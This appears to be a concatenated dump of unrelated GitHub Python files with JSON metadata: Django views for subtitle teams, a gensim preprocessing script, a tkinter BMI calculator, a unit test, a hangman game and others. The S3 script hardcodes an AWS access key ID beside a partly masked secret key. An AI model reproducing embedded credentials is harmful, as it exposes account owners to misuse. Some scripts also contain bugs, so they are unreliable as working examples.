Parse the file, etc.\n\n messages.success(request, _(u\"Draft uploaded successfully.\"))\n else:\n messages.error(request, _(u\"There was a problem uploading that draft.\"))\n\n return HttpResponseRedirect(reverse('teams:team_tasks', args=[], kwargs={'slug': slug}))\n else:\n return HttpResponseBadRequest()\n\n# Projects\ndef project_list(request, slug):\n team = get_object_or_404(Team, slug=slug)\n projects = Project.objects.for_team(team)\n return render_to_response(\"teams/project_list.html\", {\n \"team\":team,\n \"projects\": projects\n }, RequestContext(request))\n\n@render_to('teams/settings-projects-add.html')\n@login_required\ndef add_project(request, slug):\n team = Team.get(slug, request.user)\n\n if request.POST:\n form = ProjectForm(request.POST)\n workflow_form = WorkflowForm(request.POST)\n\n if form.is_valid() and workflow_form.is_valid():\n\n if team.project_set.filter(slug=pan_slugify(form.cleaned_data['name'])).exists():\n messages.error(request, _(u\"There's already a project with this name\"))\n else:\n project = form.save(commit=False)\n project.team = team\n project.save()\n\n if project.workflow_enabled:\n workflow = workflow_form.save(commit=False)\n workflow.team = team\n workflow.project = project\n workflow.save()\n\n messages.success(request, _(u'Project added.'))\n return HttpResponseRedirect(\n reverse('teams:settings_projects', args=[], kwargs={'slug': slug}))\n else:\n form = ProjectForm()\n workflow_form = WorkflowForm()\n\n return { 'team': team, 'form': form, 'workflow_form': workflow_form, }\n\n@render_to('teams/settings-projects-edit.html')\n@login_required\ndef edit_project(request, slug, project_slug):\n team = Team.get(slug, request.user)\n project = Project.objects.get(slug=project_slug, team=team)\n project_list_url = reverse('teams:settings_projects', args=[], kwargs={'slug': slug})\n\n if project.is_default_project:\n messages.error(request, _(u'You cannot edit that project.'))\n return HttpResponseRedirect(project_list_url)\n\n try:\n workflow = Workflow.objects.get(team=team, project=project)\n except Workflow.DoesNotExist:\n workflow = None\n\n if request.POST:\n if request.POST.get('delete', None) == 'Delete':\n project.delete()\n messages.success(request, _(u'Project deleted.'))\n return HttpResponseRedirect(project_list_url)\n else:\n form = ProjectForm(request.POST, instance=project)\n workflow_form = WorkflowForm(request.POST, instance=workflow)\n\n # if the project doesn't have workflow enabled, the workflow form\n # is going to fail to validate (workflow is None)\n # there's probably a better way of doing this...\n if form.is_valid() and workflow_form.is_valid if project.workflow_enabled else form.is_valid():\n form.save()\n\n if project.workflow_enabled:\n workflow = workflow_form.save(commit=False)\n workflow.team = team\n workflow.project = project\n workflow.save()\n\n messages.success(request, _(u'Project saved.'))\n return HttpResponseRedirect(project_list_url)\n\n else:\n form = ProjectForm(instance=project)\n workflow_form = WorkflowForm(instance=workflow)\n\n return { 'team': team, 'project': project, 'form': form, 'workflow_form': workflow_form, }\n\n@render_to('teams/_third-party-accounts.html')\n@login_required\ndef third_party_accounts(request, slug):\n from accountlinker.views import _generate_youtube_oauth_request_link\n team = get_object_or_404(Team, slug=slug)\n if not can_change_team_settings(team, request.user):\n messages.error(request, _(u'You do not have permission to edit this team.'))\n return HttpResponseRedirect(team.get_absolute_url())\n\n new_youtube_url = _generate_youtube_oauth_request_link(str(team.pk))\n linked_accounts = team.third_party_accounts.all()\n return {\n \"team\":team,\n \"new_youtube_url\": new_youtube_url,\n \"linked_accounts\": linked_accounts,\n }\n\n\n# Unpublishing\ndef _create_task_after_unpublishing(subtitle_version):\n team_video = subtitle_version.language.video.get_team_video()\n lang = subtitle_version.language.language\n\n # If there's already an open task for this language we don't need another.\n open_task_exists = team_video.task_set.incomplete().filter(language=lang).exists()\n\n if open_task_exists:\n return None\n\n workflow = Workflow.get_for_team_video(team_video)\n if workflow.approve_allowed:\n type = Task.TYPE_IDS['Approve']\n can_do = can_approve\n else:\n type = Task.TYPE_IDS['Review']\n can_do = can_review\n\n # Try to guess the appropriate assignee by looking at the last task.\n last_task = (team_video.task_set.complete().filter(language=lang, type=type)\n .order_by('-completed')\n [:1])\n assignee = None\n if last_task:\n candidate = last_task[0].assignee\n if candidate and can_do(team_video, candidate, lang):\n assignee = candidate\n\n task = Task(team=team_video.team, team_video=team_video,\n assignee=assignee, language=lang, type=type,\n subtitle_version=subtitle_version)\n task.set_expiration()\n task.save()\n\n return task\n\ndef _propagate_unpublish_to_external_services(language_pk, language_code, video):\n \"\"\"Push the 'unpublishing' of subs to third-party providers for the given language.\n\n The unpublishing must be fully complete before this function is called.\n\n \"\"\"\n try:\n language = SubtitleLanguage.objects.get(pk=language_pk)\n except SubtitleLanguage.DoesNotExist:\n delete_captions_in_original_service_by_code.delay(language_code, video.pk)\n return\n\n # Find the latest public version to determine what kind of third-party call\n # we need to make.\n latest_version = language.latest_version(public_only=True)\n\n if latest_version:\n # There's a latest version that's still public, so third-party services\n # should use that one.\n upload_subtitles_to_original_service.delay(latest_version.pk)\n else:\n # There's no latest version that's still public, but we know the\n # language still exists.\n #\n # This means that all of the subs in the language have been unpublished\n # and are awaiting moderation.\n #\n # In this case we should delete the subs from the external service\n # entirely, since we know that all the subs we have are bad.\n delete_captions_in_original_service.delay(language_pk)\n\ndef _propagate_unpublish_to_tasks(team_video, language_pk, language_code):\n \"\"\"Push the 'unpublishing' of a language to any tasks applying to it.\n\n The unpublishing must be fully complete before this function is called.\n\n \"\"\"\n try:\n language = SubtitleLanguage.objects.get(pk=language_pk)\n if language and language.latest_version(public_only=False):\n # Don't kill any tasks if there are still versions remaining.\n return\n except SubtitleLanguage.DoesNotExist:\n pass\n\n tasks_to_delete = team_video.task_set.not_deleted()\n\n # If there is still no original language left, we can just delete all the\n # tasks for this video because someone deleted everything.\n #\n # If there *is* an original language left, we just delete tasks for the\n # languages that were unpublished.\n if team_video.video.subtitle_language():\n tasks_to_delete = tasks_to_delete.filter(language=language_code)\n\n tasks_to_delete.update(deleted=True)\n\ndef unpublish(request, slug):\n team = get_object_or_404(Team, slug=slug)\n\n form = UnpublishForm(request.user, team, request.POST)\n if not form.is_valid():\n messages.error(request, _(u'Invalid unpublishing request.\\nErrors:\\n') + '\\n'.join(flatten_errorlists(form.errors)))\n return HttpResponseRedirect(request.POST.get('next', team.get_absolute_url()))\n\n version = form.cleaned_data['subtitle_version']\n team_video = version.language.video.get_team_video()\n video = version.language.video\n scope = form.cleaned_data['scope']\n should_delete = form.cleaned_data['should_delete']\n language = version.language\n\n results = []\n if scope == 'version':\n results.append([version.language.pk, version.language.language,\n version.unpublish(delete=should_delete)])\n elif scope == 'dependents':\n translations = list(SubtitleLanguage.objects.filter(video=language.video,\n standard_language=language,\n is_forked=False))\n for l in [language] + translations:\n results.append([l.pk, l.language,\n l.unpublish(delete=should_delete)])\n else:\n assert False, 'Invalid scope.'\n\n for language_pk, language_code, version_for_task in results:\n _propagate_unpublish_to_external_services(language_pk, language_code, video)\n _propagate_unpublish_to_tasks(team_video, language_pk, language_code)\n\n if version_for_task:\n _create_task_after_unpublishing(version_for_task)\n\n metadata_manager.update_metadata(team_video.video.pk)\n update_one_team_video(team_video.pk)\n\n messages.success(request, _(u'Successfully unpublished subtitles.'))\n api_subtitles_rejected.send(version)\n return HttpResponseRedirect(request.POST.get('next', team.get_absolute_url()))\n\n@login_required\ndef auto_captions_status(request, slug):\n \"\"\"\n Prints a simple table of partner status for captions, this should\n should be used internally (as a cvs file with tab delimiters)\n \"\"\"\n buffer = []\n team = get_object_or_404(Team, slug=slug)\n if not team.is_member(request.user):\n return HttpResponseForbidden(\"Not allowed\")\n buffer.append( \"Video\\tproject\\tURL\\tstatus\\tjob_id\\ttask_id\\tcreated on\\tcompleted on\")\n for tv in team.teamvideo_set.all().select_related(\"job\", \"project\", \"video\"):\n jobs = tv.job_set.all()\n extra = \"\"\n if jobs.exists():\n j = jobs[0]\n extra = \"%s\\t%s\\t%s\\t%s\\t%s\" % (j.status, j.job_id, j.task_id, j.created_on, j.completed_on)\n url = \"%s://%s%s\" % (DEFAULT_PROTOCOL, Site.objects.get_current().domain, tv.video.get_absolute_url())\n buffer.append( \"Video:%s\\t %s\\t%s\\t %s\" % (tv.video.title,tv.project.name, url, extra))\n response = HttpResponse( \"\\n\".join(buffer), content_type=\"text/csv\")\n response['Content-Disposition'] = 'filename=team-status.csv'\n return response\n","repo_name":"nemgue/unisubs","sub_path":"apps/teams/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":59698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"73319974511","text":"from gensim.corpora import Dictionary, MmCorpus\nfrom konlpy.tag import Okt\nfrom gensim import word2vec\nfrom gensim.models import Phrases\nimport csv\n\ntwitter = Okt()\nresults = []\n\ndata_path = 'posts_data_50.csv'\nparsed_path = 'parsed_bamboo.txt'\nword2vec_path = 'Bambooword2vec.model'\n\n\n# parsing the data to parsed_bamboo.txt\ndef clean_posts(post):\n lines = post[0].split(\"\\n\")\n for line in lines:\n temp_list = twitter.pos(line, norm=True, stem=True)\n r = []\n for word in temp_list:\n if not word[1] in [\"Josa\", \"Eomi\", \"Punctuation\"]:\n r.append(word[0])\n rl = (\" \".join(r)).strip()\n return rl\n\n\nwith open(data_path, 'w') as f:\n data = csv.reader(f, delimiter=',')\n for row in data:\n results.append(clean_posts(row))\n\n\nwith open(parsed_path, 'w', encoding='utf-8') as fp:\n fp.write(\"\\n\".join(results))\n\n# making of the lda phrases analysis\n\n# making of the dictionary for lda topic analysis\ndict_made = False\n\ndict_path = 'dictionary.dict'\n\nif dict_made:\n dictionary = Dictionary.load(dict_path)\nelse:\n reviews_for_lda = word2vec.LineSentence(reviews_for_lda_filepath)\n dictionary = Dictionary(reviews_for_lda)\n dictionary.filter_extremes(no_below=10, no_above=0.4)\n dictionary.compactify()\n\n dictionary.save(dict_path)","repo_name":"haesookim/fbpage-scraping-exercise","sub_path":"lda_alt.py","file_name":"lda_alt.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34877042495","text":"# importing the tkinter module\nfrom tkinter import *\n\n# creating root window\nroot = Tk()\nroot.title(\"Ideal Body Mass Index\")\nroot.geometry(\"900x700\")\nroot.config(bg=\"cyan\")\nheader = Label(root, text='Ideal Body Mass Index Calculator', bg='gold', fg='blue', font=30)\nheader.place(x=250, y=20)\n\n# creating a frame in a root\nframe = Frame(root, width=500, height=200, relief='raised', bg='goldenrod')\nframe.place(x=200, y=50)\n\n# creating labels in a frame\nbmi_weight = Label(frame, text=\"Weight(kg):\", bg='white', fg='green')\nbmi_weight.place(x=50, y=20)\nbmi_weight_entry = Entry(frame)\nbmi_weight_entry.place(x=200, y=20)\n\nbmi_height = Label(frame, text=\"Height(cm):\", bg='white', fg='green')\nbmi_height.place(x=45, y=60)\nbmi_height_entry = Entry(frame)\nbmi_height_entry.place(relx=0.4, rely=0.3)\n\nuser_gender = Label(frame, text=\"Gender:\", bg='white', fg='green')\nuser_gender.place(rely=0.53, relx=0.1)\n\nage = Label(frame, text=\"Age:\", bg='white', fg='green')\nage.place(rely=0.8, relx=0.1)\nage_entry = Entry(frame, state='readonly')\nage_entry.place(rely=0.8, relx=0.4)\n\noptions = ['Female...', 'Male']\nvariable = StringVar(frame)\nvariable.set(options[0])\n\n# Below is the functions created\ndef activate(value):\n variable.set(value)\n if value != \"Select...\":\n age_entry.config(state='normal')\n else:\n age_entry.config(state='readonly')\n\n\ngender_menu = OptionMenu(frame, variable, *options, command=activate)\ngender_menu.place(relx=0.4, rely=0.5)\n\n\ndef bmi_calc():\n try:\n float(bmi_weight_entry.get())\n float(bmi_height_entry.get())\n float(age_entry.get())\n if variable.get() == \"Female..\":\n raise ValueError\n elif variable.get() == \"Male\":\n result = ((0.5 * float(bmi_weight_entry.get())) / ((float(bmi_height_entry.get()) / 100) ** 2)) + 11.5\n result = round(result, 1)\n ideal_field.config(state='normal')\n ideal_field.insert(0, result)\n ideal_field.config(state='readonly')\n result_bmi = float(bmi_weight_entry.get()) / ((float(bmi_height_entry.get()) / 100) ** 2)\n bmi_field.config(state='normal')\n bmi_field.insert(0, round(result_bmi, 1))\n bmi_field.config(state='readonly')\n elif variable.get() == \"Female\":\n result = ((0.5 * float(bmi_weight_entry.get())) / ((float(bmi_height_entry.get()) / 100) ** 2)) + (\n 0.03 * float(age_entry.get())) + 11\n result = round(result, 1)\n ideal_field.config(state='normal')\n ideal_field.insert(0, result)\n ideal_field.config(state='readonly')\n result_bmi = float(bmi_weight_entry.get()) / ((float(bmi_height_entry.get()) / 100) ** 2)\n bmi_field.config(state='normal')\n bmi_field.insert(0, round(result_bmi, 1))\n bmi_field.config(state='readonly')\n if result_bmi < 18.5:\n category.config(text='Underweight')\n elif 18.5 <= result_bmi < 25:\n category.config(text='Healthy')\n elif 25 <= result_bmi < 30:\n category.config(text='Overweight')\n elif result_bmi >= 30:\n category.config(text='Obese')\n\n except ValueError:\n messagebox.showerror(title=None, message='Gender was not specified or invalid entry was given')\n delete()\n\n\ncalculate = Button(root, text=\"Calculate your Ideal Body Mass Index\", width=50, command=bmi_calc)\ncalculate.place(rely=0.45, relx=0.2)\n\nbmi = Label(root, text=\"BMI:\", bg='white', fg=\"green\")\nbmi.place(rely=0.55, relx=0.1)\nbmi_field = Entry(root, state='readonly')\nbmi_field.place(rely=0.55, relx=0.2)\nideal_bmi = Label(root, text='Ideal BMI:', bg='white', fg=\"green\")\nideal_bmi.place(rely=0.55, relx=0.5)\nideal_field = Entry(root, state='readonly')\nideal_field.place(rely=0.55, relx=0.65)\n\n# The delete button function\ndef delete():\n bmi_weight_entry.delete(0, END)\n bmi_height_entry.delete(0, END)\n age_entry.config(state='normal')\n bmi_field.config(state='normal')\n ideal_field.config(state='normal')\n age_entry.delete(0, END)\n bmi_field.delete(0, END)\n ideal_field.delete(0, END)\n age_entry.config(state='readonly')\n bmi_field.config(state='readonly')\n ideal_field.config(state='readonly')\n bmi_weight_entry.focus()\n variable.set(options[0])\n category.config(text='')\n\n\ncategory_head = Label(root, text=\"Category:\", bg='orange', fg='white')\ncategory = Label(root, width=20, bg='blue', fg='white')\ncategory.place(relx=0.38, rely=0.72)\ncategory_head.place(relx=0.45, rely=0.67)\nclear = Button(root, text='Clear', command=delete)\nclear.place(rely=0.85, relx=0.1)\nquit = Button(root, text='Exit', command='exit')\nquit.place(rely=0.85, relx=0.83)\n\n\nroot.mainloop()\n","repo_name":"mndabeni06/BMI_CALCULATOR","sub_path":"BMI.py","file_name":"BMI.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72611774831","text":"import testtools\nfrom unittest import mock\n\nfrom troveclient.v1 import root\n\n\"\"\"\nUnit tests for root.py\n\"\"\"\n\n\nclass RootTest(testtools.TestCase):\n def setUp(self):\n super(RootTest, self).setUp()\n self.orig__init = root.Root.__init__\n root.Root.__init__ = mock.Mock(return_value=None)\n self.root = root.Root()\n self.root.api = mock.Mock()\n self.root.api.client = mock.Mock()\n\n def tearDown(self):\n super(RootTest, self).tearDown()\n root.Root.__init__ = self.orig__init\n\n def _get_mock_method(self):\n self._resp = mock.Mock()\n self._body = None\n self._url = None\n\n def side_effect_func(url, body=None):\n self._body = body\n self._url = url\n return (self._resp, body)\n\n return mock.Mock(side_effect=side_effect_func)\n\n def test_delete(self):\n self.root.api.client.delete = self._get_mock_method()\n self._resp.status_code = 200\n self.root.delete(1234)\n self.assertEqual('/instances/1234/root', self._url)\n self._resp.status_code = 400\n self.assertRaises(Exception, self.root.delete, 1234)\n","repo_name":"openstack/python-troveclient","sub_path":"troveclient/tests/test_root.py","file_name":"test_root.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"38"} +{"seq_id":"17949364832","text":"#_main_\r\nli=[]\r\nwhile(True):\r\n item = eval(input(\"\\nEnter any correct format item to insert = \"))\r\n ind = int(input(\"Enter the index for insertion = \"))\r\n if(ind>len(li) or ind<0):\r\n print(\"Array index is out of range. Try Again !\")\r\n continue\r\n else:\r\n li.insert(ind, item)\r\n print(\"Now your array = \", li)\r\n \r\n choice = int(input(\"Want to continue? (1/0) = \"))\r\n if(choice==0):\r\n print(\"---> Come again later <---\")\r\n break\r\n continue","repo_name":"RitamPaul/Python_Scripting_College","sub_path":"insertItems_List.py","file_name":"insertItems_List.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"484128203","text":"import boto3\nimport pandas as pd\nimport numpy as np\nfrom io import StringIO\nfrom scipy.stats import entropy\nfrom datetime import datetime\n\nS3_BUCKET = 'dmm-microbench'\n\ns3 = boto3.client('s3', aws_access_key_id=\"AKIASVDNFDSGZYUVLQED\", aws_secret_access_key=\"y8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXre\")\n\ndef download_s3_file(file_name, destination_file_name):\n s3.download_file(Bucket=S3_BUCKET, Key=file_name, Filename=destination_file_name)\n\ndef get_content(file_name, expression):\n return s3.select_object_content(\n Bucket=S3_BUCKET,\n Key=file_name,\n ExpressionType='SQL',\n Expression=expression,\n InputSerialization={'CSV': {\"FileHeaderInfo\": \"Use\"}},\n OutputSerialization={'CSV': {}},\n )\n\n\ndef convert_data_to_df(data, record_header):\n for event in data['Payload']:\n if 'Records' in event:\n record_header.append(event['Records']['Payload'])\n csv_content = ''.join(r.decode('utf-8').replace(\"\\r\", \"\") for r in record_header)\n csv_pd = pd.read_csv(StringIO(csv_content))\n\n print('\\n##################################')\n print(f\"Length of dataframe: {len(csv_pd)}\")\n print(f\"Memory usage of dataframe: \\n {csv_pd.info(memory_usage='deep')}\")\n print('\\n##################################')\n\n return pd.DataFrame(csv_pd)\n\ndef convert_file_to_hdf5(file_name):\n import vaex\n vaex.from_csv(file_name, convert=True, chunk_size=500_000)\n\ni = 1\n\ndownload_s3_file(f\"yellow_tripdata_2019-0{i}.csv\", f\"yellow_tripdata_2019-0{i}.csv\")\n \nconvert_file_to_hdf5(f\"yellow_tripdata_2019-0{i}.csv\")","repo_name":"mohithg/largedata-histogram","sub_path":"test_vaex.py","file_name":"test_vaex.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21211815754","text":"import math\nimport sys\n\ndef C(n, k):\n return math.factorial(n) // math.factorial(k) // math.factorial(n-k)\n\ndef main():\n billionaire_ways = 0\n for h in range(432, 1001):\n billionaire_ways += C(1000, h)\n print(billionaire_ways / 2**1000)\n \nif __name__ == '__main__':\n sys.exit(main())\n\n# Final capital = (1 + 2x)^h (1 - x)^(1000 - h) where h is the count of heads.\n#\n# To be a billionaire, we need (1 + 2x)^h (1 - x)^(1000 - h) >= 10^9.\n# Or h >= (9 Log[10] - 1000 Log[1 - x])/(-Log[1 - x] + Log[1 + 2 x])\n#\n# By Wolfram Alpha website, we can solve the equation D[g(x), x] = 0\n# The proportion x ~~ 0.14688392244094067657558240, and thus \n# g(x) ~~ 431.25594829396045105038827, or h = 432.\n","repo_name":"syurskyi/Algorithms_and_Data_Structure","sub_path":"_algorithms_challenges/projecteuler/ProjectEuler-master(2)/ProjectEuler-master/267.py","file_name":"267.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"15647171467","text":"import turtle\nfrom random import shuffle\nimport unicodedata\nimport time\n\n\ndef nome_jogo(turtle):\n turtle.setpos(20,230)\n turtle.write('Jogo da Forca', font=('Arial',20,'bold'))\n turtle.home()\n\ndef desenho_forca(turtle, window_comprimento):\n coordenada_x1 = (window_comprimento/-2)+30\n turtle.setpos(coordenada_x1,-200)\n turtle.pendown()\n turtle.forward(150)\n turtle.right(90)\n turtle.forward(25)\n turtle.right(90)\n turtle.forward(150)\n turtle.right(90)\n turtle.forward(25)\n turtle.penup()\n coordenada_x2 = (window_comprimento/-2)+105\n turtle.setpos(coordenada_x2,-200)\n turtle.pendown()\n turtle.forward(250)\n turtle.right(90)#(-245,150)\n turtle.forward(100)\n turtle.right(90)#(-145,150)\n turtle.forward(25)\n turtle.penup()\n turtle.left(90)#(-145,125)\n turtle.home()\n\ndef desenho_cabeca (turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,25)\n turtle.left(180)\n turtle.pendown()\n turtle.fillcolor('yellow')\n turtle.begin_fill()\n turtle.circle(25)\n turtle.end_fill()\n turtle.fillcolor('black')\n turtle.penup()\n turtle.left(180)\n turtle.home()\n\ndef desenho_dorso(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(90)\n turtle.pendown()\n turtle.forward(80)\n turtle.penup()\n turtle.left(90)\n turtle.home()\n\ndef desenho_left_arm(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(135)\n turtle.pendown()\n turtle.forward(60)\n turtle.penup()\n turtle.left(135)\n turtle.home()\n\ndef desenho_right_arm(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-25)\n turtle.right(45)\n turtle.pendown()\n turtle.forward(60)\n turtle.penup()\n turtle.left(45)\n turtle.home()\n\ndef desenho_left_leg(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-105)\n turtle.right(120)\n turtle.pendown()\n turtle.forward(65)\n turtle.penup()\n turtle.left(120)\n turtle.home()\n\ndef desenho_right_leg(turtle, window_comprimento):\n coordenada_x = (window_comprimento/-2)+205\n turtle.setpos(coordenada_x,-105)\n turtle.right(60)\n turtle.pendown()\n turtle.forward(65)\n turtle.penup()\n turtle.left(60)\n turtle.home()\n\ndef desenho_espacos(turtle, letras_palavra, window_comprimento):\n posicoes_letras = []\n coordenada_x = (window_comprimento/2)-30\n turtle.setpos(coordenada_x,-225)\n turtle.left(180)\n turtle.pensize(3)\n for i in letras_palavra:\n if i == ' ':\n turtle.forward(35)\n posicoes_letras.append([turtle.pos(),i])\n else:\n turtle.pendown()\n turtle.forward(30)\n turtle.penup()\n turtle.forward(5)\n posicoes_letras.append([turtle.pos(),i])\n turtle.pensize(5)\n turtle.left(180)\n turtle.home()\n posicoes_letras.reverse()\n return posicoes_letras\n\ndef desenho_letras(turtle, palavra, posicoes_letras, escolha, window_comprimento, erros, acertos, erros_lista):\n text1 = str(unicodedata.normalize('NFKD',palavra).encode('ASCII','ignore'))\n no_accent = text1[2:len(text1)-1]\n \n coordenada_x = (window_comprimento/-2)+erros*20\n index_acertos = []\n erro = ''\n \n \n if escolha in no_accent:\n for x,e in enumerate(no_accent):\n if escolha == e:\n index_acertos.append(x)\n if index_acertos in acertos:\n None\n for i in index_acertos:\n turtle.setpos((posicoes_letras[i][0][0])+15,(posicoes_letras[i][0][1]))\n turtle.write(posicoes_letras[i][1], font=('Arial',20,'bold'))\n turtle.home()\n return 0,index_acertos,None\n else:\n erro = escolha\n if erro in erros_lista:\n return 1,None,None\n else:\n turtle.setpos(coordenada_x+30,-255)\n turtle.write(escolha, font=('Arial',18,'bold'))\n turtle.home()\n return 1,None,erro\n\ndef caneta_setup ():\n caneta.hideturtle()\n caneta.speed(100)\n caneta.penup()\n caneta.color('Black')\n caneta.pensize(5)\n\ndef setup_window(comprimento):\n if comprimento <= 500:\n comprimento += 80\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 500 and comprimento <= 650:\n comprimento += 30\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 650 and comprimento <= 800:\n comprimento -= 30\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n elif comprimento > 800 and comprimento <= 1000:\n comprimento -= 110\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n else:\n comprimento -= 250\n window.setup(width=comprimento,height=600,startx=None,starty=None)\n\ndef body_maker(erros):\n if erros == 1:\n desenho_cabeca(caneta, window.window_width())\n elif erros == 2:\n desenho_dorso(caneta, window.window_width())\n elif erros == 3:\n desenho_left_arm(caneta, window.window_width())\n elif erros == 4:\n desenho_right_arm(caneta, window.window_width())\n elif erros == 5:\n desenho_left_leg(caneta, window.window_width())\n elif erros == 6:\n desenho_right_leg(caneta, window.window_width())\n caneta.setpos(-100,100)\n caneta.write('Você perdeu', font=('Arial',18,'bold'))\n time.sleep(2)\n return True\n\ndef repor_desenho(turtle, posicoes_letras, acertos, erros, erros_lista, window_comprimento):\n coordenada_x = (window_comprimento/-2)+30\n \n for i in acertos:\n turtle.setpos((posicoes_letras[i][0][0])+15,(posicoes_letras[i][0][1]))\n turtle.write(posicoes_letras[i][1], font=('Arial',20,'bold'))\n turtle.home()\n \n if erros == 1:\n desenho_cabeca(caneta, window.window_width())\n elif erros == 2:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n elif erros == 3:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n elif erros == 4:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n desenho_right_arm(caneta, window.window_width())\n elif erros == 5:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n desenho_right_arm(caneta, window.window_width())\n desenho_left_leg(caneta, window.window_width())\n elif erros == 6:\n desenho_cabeca(caneta, window.window_width())\n desenho_dorso(caneta, window.window_width())\n desenho_left_arm(caneta, window.window_width())\n desenho_right_arm(caneta, window.window_width())\n desenho_left_leg(caneta, window.window_width())\n desenho_right_leg(caneta, window.window_width())\n caneta.setpos(-100,100)\n caneta.write('Você perdeu', font=('Arial',18,'bold'))\n return True\n else:\n None\n \n turtle.setpos(coordenada_x,-255)\n for j in erros_lista:\n turtle.write(j, font=('Arial',18,'bold'))\n turtle.forward(20)\n\ndef sim():\n window.reset()\n caneta.setpos(-95,0)\n caneta.write('Clique para Sair', font=('Arial',18,'bold'))\n caneta.home()\n window.exitonclick()\n\n'''\n-------------------------------------------------------------------------------\n'''\n\n\nwindow = turtle.Screen() # limite_x: +-330, Limite_y: +-270\nwindow.bgcolor('lightblue')\nwindow.title('Jogo da Forca')\n\n\ncaneta = turtle.Turtle()\ncaneta_setup()\n\n\n\nlista_palavras = [] \nL = open('entrada.txt','r+',encoding='utf-8')\n\nfor i in L.readlines():\n s = i.lower().strip()\n if s == '':\n None\n else:\n lista_palavras.append(s)\nL.close()\n'''\n-------------------------------------------------------------------------------\n'''\n\nletras_palavra = []\n\nwhile lista_palavras != []:\n shuffle(lista_palavras)\n palavra = lista_palavras[int(len(lista_palavras)/2)]\n del lista_palavras[int(len(lista_palavras)/2)]\n \n for i in palavra:\n letras_palavra.append(i)\n letras_palavra.reverse()\n \n comprimento = (len(letras_palavra)*35)*2\n\n setup_window(comprimento)\n nome_jogo(caneta)\n desenho_forca(caneta, window.window_width())\n \n posicoes_letras = desenho_espacos(caneta, letras_palavra, window.window_width()) \n \n escolha = ''\n erros = 0\n erros_lista = []\n acertos = [] \n \n while True:\n escolha = window.textinput('','Escolha uma letra ou chute a palavra')\n \n if escolha == None:\n caneta.setpos(-175,100)\n caneta.write('Jogador desistiu. Volte sempre.', font=('Arial',18,'bold'))\n time.sleep(2)\n break\n else:\n text1 = str(unicodedata.normalize('NFKD',palavra).encode('ASCII','ignore'))\n no_accent = text1[2:len(text1)-1]\n if escolha == no_accent or escolha == palavra:\n caneta.setpos(-100,100)\n caneta.write('Você ganhou', font=('Arial',18,'bold'))\n time.sleep(2)\n break\n elif escolha.isalpha() and len(escolha) == 1:\n a = []\n s = 0\n e = ''\n \n s,a,e = desenho_letras(caneta, palavra, posicoes_letras, escolha, window.window_width(), erros, acertos, erros_lista)\n if a == None:\n a = []\n else:\n for i in a:\n acertos.append(i)\n \n if e == None:\n e = ''\n else:\n erros_lista.append(e)\n erros += s\n \n \n p = body_maker(erros)\n if p == True:\n break\n \n \n if len(acertos) == len(palavra):\n caneta.setpos(-100,100)\n caneta.write('Você ganhou', font=('Arial',18,'bold'))\n time.sleep(2)\n break\n else:\n caneta.setpos(-95,100)\n caneta.write('Escolha Inválida.', font=('Arial',18,'bold'))\n time.sleep(2)\n caneta.reset()\n caneta_setup()\n \n nome_jogo(caneta)\n desenho_forca(caneta, window.window_width())\n desenho_espacos(caneta, letras_palavra, window.window_width())\n repor_desenho(caneta, posicoes_letras, acertos, erros, erros_lista, window.window_width())\n caneta.reset()\n window.reset()\n caneta_setup()\n if escolha == None:\n caneta.setpos(-95,0)\n caneta.write('Clique para Sair', font=('Arial',18,'bold'))\n caneta.home()\n window.exitonclick()\n \n \n \n \n'''\n-------------------------------------------------------------------------------\n'''\n\n\n\nwindow.exitonclick()\n","repo_name":"IgneousGuikas/RodrigoGikas_EP2","sub_path":"Exercicio Jogo da Forca(9).py","file_name":"Exercicio Jogo da Forca(9).py","file_ext":"py","file_size_in_byte":11451,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18432273630","text":"'''\n========================\nservice utilities module\n========================\nCreated on July.14, 2020\n@author: Xu Ronghua\n@Email: rxu22@binghamton.edu\n@TaskDescription: This module provide encapsulation of test API to interact with RPC exposed by service node.\n'''\n\nimport time\nimport logging\nimport requests\nimport json\n\nfrom utilities import TypesUtil, FileUtil\nfrom wrapper_pyca import Crypto_Hash, Crypto_DSA\nfrom Tender_RPC import Tender_RPC\n\n\nlogger = logging.getLogger(__name__)\n# indextoken_logger = logging.getLogger(\"Index_Token\")\n# indextoken_logger.setLevel(logging.INFO)\n\n\nclass TenderUtils(object):\n @staticmethod\n 